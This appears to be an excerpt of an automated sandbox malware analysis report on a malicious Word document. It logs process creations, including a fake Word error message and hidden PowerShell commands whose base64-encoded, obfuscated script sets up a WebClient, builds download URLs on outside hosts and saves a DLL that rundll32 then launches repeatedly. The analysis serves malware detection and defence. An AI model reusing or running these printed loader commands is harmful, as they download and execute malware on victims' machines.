Source: unknown	Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	7_2_10010000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_10011C13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	7_2_1001106A
